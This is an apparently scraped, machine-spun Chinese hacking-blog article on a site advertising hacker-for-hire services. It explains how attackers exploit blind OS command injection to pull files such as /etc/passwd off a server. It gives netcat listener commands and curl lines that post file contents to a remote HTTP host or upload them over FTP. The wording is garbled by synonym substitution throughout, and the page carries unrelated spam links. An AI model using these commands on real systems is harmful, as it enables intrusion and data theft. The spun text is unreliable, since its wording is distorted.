当前位置:首页 > 黑客技术 > 正文内容

技能剖析:攻击者是怎么使用体系指令盲注完成“拖库”的

访客4年前 (2021-04-15)黑客技术501

免责声明:本文旨在技能共享,仅供安全学习,制止不合法运用。
在浸透测验或许CTF应战中,你或许会遇到一个需求用户输入文本信息的运用程序,该运用会将用户的输入作为参数传递给一个体系指令或许给底层运转着使命的相关程序。而咱们知道,假如没有对输入的信息进行校验或许过滤,那么该运用就或许被运用来进行“操作体系指令注入”。
关于进犯者来说,他能够经过注入缝隙,运用运用程序的权限来履行指令。在这种布景下,现在咱们在实践的运用事例中,也观察到这种类型的进犯缝隙,存在于许多的运用程序。而针对的运用程序往往是以下的运用类型,例如:
•能够发送邮件到用户指定地址的运用程序。
•能够监控企业服务器运转状况的运用程序
•运用根据用户输入的第三方东西来完结传输陈述的运用程序
在浸透测验或许CTF中,在承认了缝隙之后,你或许开端对方针主机上感兴趣的区域进行勘探剖析了,希望能找到奖杯或许其他有用的信息,如,
操作体系密码文件
操作体系装备文件
数据库文件
运用程序源代码
举一个根本的比如,经过注入Windows指令“type”,作为一个参数进行传递,去读取服务器上的一个文件,最终回来相关文本信息。

许多时分,需求对正在履行的指令作中止。能够幻想一下,一个体系监测运用软件,在监测主机存活状况时,会去ping一个ip地址,检测主机是否在线。那么在体系的底层也会履行用户输入的IP地址,如
ping –c 5 xxx.xxx.xxx.xxx
假如在运用程序现已运转ping指令之后,你还想运转其他指令的话,能够参阅以下的注入指令办法:

在上个比如中,咱们经过“type”指令,在HTTP呼应之后,回来服务器上的相应的文本信息。那么在实践环境中,往往在注入指令之后,没有任何的输出回来,那么打开注入的办法被称为“操作体系指令盲注”。
在这种状况下咱们怎么找到有用的信息?下面将具体介绍一些办法,能够无需上传 web shell 到主机上。
NetCat
第一个比如是经过运用“瑞士军刀”netcat来完成的。信任关于诸位来说,Netcat并不生疏,乃至关于许多人来说,用了良久依然也是爱不释手。简略来说,它是一款能够读、写TCP或UDP网络连接的东西。假如在方针服务器上运转着netcat,那么你能够运用它来树立监听端,然后将输出的体系操作指令重定向到监听端服务器上。
经过以下管道,将文件重定向到监听端上。
 nc –l –p {port}  {file/to/extract}
这样能从你的主机上连接到方针服务器上的监听端,然后重定向规范输出。以下是展现怎么将 /etc/passwd重定向到主机上的。

假如主机运转的是Windows体系,以及netcat存在相似的进犯或许,能够尝试用下面的指令:
type {file to extract}  | nc -L -p {port}
cURL
cURL是一个运用多种协议传输数据的指令行东西和库,是一个十分有用的数据库下载东西。假如方针服务器有 cURL,那么咱们依然能够运用它来post文件到指定的服务器上或许经过其他协议来传输文件,如FTP/SCP/TFTP/TELNET等协议。
在你现已承认了一个体系操作指令注入缝隙之后,要经过 HTTP协议来传输文件,能够运用以下指令来post文件到web服务器上。
cat /path/to/file | curl –F “:data=@-“ http://xxx.xxx.xxx.xxxx:xxxx/test.txt
履行以上指令后,你能够在服务器日志上看到相关的文件内容。假如在浸透测验中,履行了以上操作, 一起需求web 服务器也保证装备运用ssl,维护客户端数据不被传播到网络上。以下展现了将/etc/passwd内容作为一个恳求回来。

CURL 指令也能够被用来经过FTP来传输文件。相同的,假如你能承认一个操作体系指令注入缝隙时,能够用以下指令来传输文件到 FTP服务器上。
curl –T {path to file} ftp://xxx.xxx.xxx.xxx –user {username}:{password}
以下是运用FTP将文件从方针服务器传输到FTP服务器上。

当然,cURL也能够运用其他的协议进行传输,如之前说到的SCP, TFTP 或TELNET,这儿就不再一一介绍了。

[1] [2] [3]  黑客接单网

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/106400.html

分享给朋友:

“技能剖析:攻击者是怎么使用体系指令盲注完成“拖库”的” 的相关文章

天猫双十一活动什么时候开始华流

以前提到双十一那都是光棍才过的节日,而现在双十一摇身一变成了全民购物狂欢节。在双十一期间以淘宝天猫为主的购物平台都会推出各种优惠活动以及满减折扣,可以算得上是全年最便宜的时候了。那么天猫双十一活动什么时候开始呢?下面就跟百思特小编来详细了解一下2020年天猫双十一开始时间吧!...

华流年京东618怎么买便宜

京东618活动已经在火热进行中的哦,各位有买什么东西了吗?很多小伙伴在活动一开始的时候就迫不及待的买了很多东西了,还有些小伙伴还很犹豫不知道买啥,接下来百思特小编就来教教大家2020年京东618怎么便宜吧~ 京东618怎么买便宜 活动时...

接单的黑客_可以找黑客黑美团吗

有在网络安全范畴中,猜测网络违法和歹意软件发展趋势好像现已成为了各大网络安全公司的传统了。 为了防止让咱们去阅览上百页的安全陈述,咱们专门整兼并总结了McAfee、Forrester、FiskIQ、卡巴斯基实验室【1、2、3】、WatchGuard、Nuvias、FireEye、CyberArk、F...

黑客了解,中国黑客越南网络apt,黑客网站密码破解工具

6.42 · hxxp[://]offlineearthquake[.]com/file//?id=&n=000 进程三:使命履行及实时数据剖析10.61 2019年6月19日,FireEye Endpoint Security设备上收到了缝隙检测警报。 违规应用程序被辨认为Microso...

糖尿病胰岛素多少钱一支_血糖高不高,看脚就知道

饮食和运动可以让你不怕糖尿病过好生活.也与运动太少有关。眼睛发痒一般是过敏.哪家医院对糖尿病的治疗上信誉. 血糖高是哪个部位.据统计,黎明现象,空腹和。 精神状态等各方面根本的健康因素并不重视,不过在这家医院现在可以实现跨省异地直接,之前就血糖高,口服药是可以降糖的!治疗导致的并发症,就换了别的药,...

Webshell安全检测篇

0x00 依据流量的检测办法 1.概述 笔者一直在重视webshell的安全剖析,最近就这段时刻的心得体会和咱们做个共享。 webshell一般有三种检测办法: 依据流量方法 依据agent方法(本质是直接剖析webshell文件) 依据日志剖析方法 Webshell的分...

评论列表

辞眸里予
3年前 (2022-07-03)

用来经过FTP来传输文件。相同的,假如你能承认一个操作体系指令注入缝隙时,能够用以下指令来传输文件到 FTP服务器上。curl –T {path to file} ftp://xxx.xxx.xxx.xxx

俗野路岷
3年前 (2022-07-04)

运用根据用户输入的第三方东西来完结传输陈述的运用程序在浸透测验或许CTF中,在承认了缝隙之后,你或许开端对方针主机上感兴趣的区域进行勘探剖析了,希望能找到奖杯或许其他有用的信息,如,操作体系密码文件

双笙痴子
3年前 (2022-07-04)

cURLcURL是一个运用多种协议传输数据的指令行东西和库,是一个十分有用的数据库下载东西。假如方针服务器有 cURL,那么咱们依然能够运用它来post文件到指定的服务器上或许经过其他协议来传输文件,如FTP/SCP/TFTP/TELNET等协议。在你现已承认了一个体系操作指令注入缝隙之后

颜于木白
3年前 (2022-07-03)

相同的,假如你能承认一个操作体系指令注入缝隙时,能够用以下指令来传输文件到 FTP服务器上。curl –T {path to file} ftp://xxx.xxx

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。